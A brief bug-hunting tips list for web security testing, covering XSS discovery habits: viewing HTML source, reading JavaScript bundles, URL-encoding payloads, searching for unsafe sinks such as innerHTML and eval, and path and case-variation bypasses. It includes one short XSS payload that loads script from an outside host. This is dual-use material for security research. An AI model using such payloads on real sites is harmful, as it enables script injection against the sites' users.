Quick Summary

A compact set of real-world bug hunting habits and mindsets

Key Techniques

1) Shortest HTML Context XSS Payload

• The shorter, the stronger. Minimal payloads often bypass naive filters.
• Example benchmark: <script src=//14.rs> (19 chars).

2) Read the HTML Source First

• Start with raw HTML (Ctrl+U → View Source). Identify parameters, routes, and injected content points before diving into JS.

3) Study the JavaScript Files

• Download and analyze all .js bundles (even minified). Look for:
  • Login or authentication request handlers
  • Dynamic path or parameter generation
  • Any client-side filtering or validation code

4) Always URL Encode Payloads

Encoding prevents early parsing or sanitization issues. It’s a must for both GET and POST vectors.

5) Debug the DOM — Frameworks Don’t Guarantee Safety

Even in React, Vue, or Angular, developers often write unsafe manual code.

• Search for innerHTML, dangerouslySetInnerHTML, eval, or new Function.
• Use DevTools → Sources → set breakpoints → observe dynamic rendering.

6) XSS in Path (Windows Targets)

Windows servers sometimes normalize backslashes and slashes differently, leading to bypasses. Always test both variations.

7) URL Case Changes and Capitalization

• Servers and routing layers can be case-sensitive in unexpected ways. Try variations like /Login, /login, /LOGIN, or mixed-case parameters.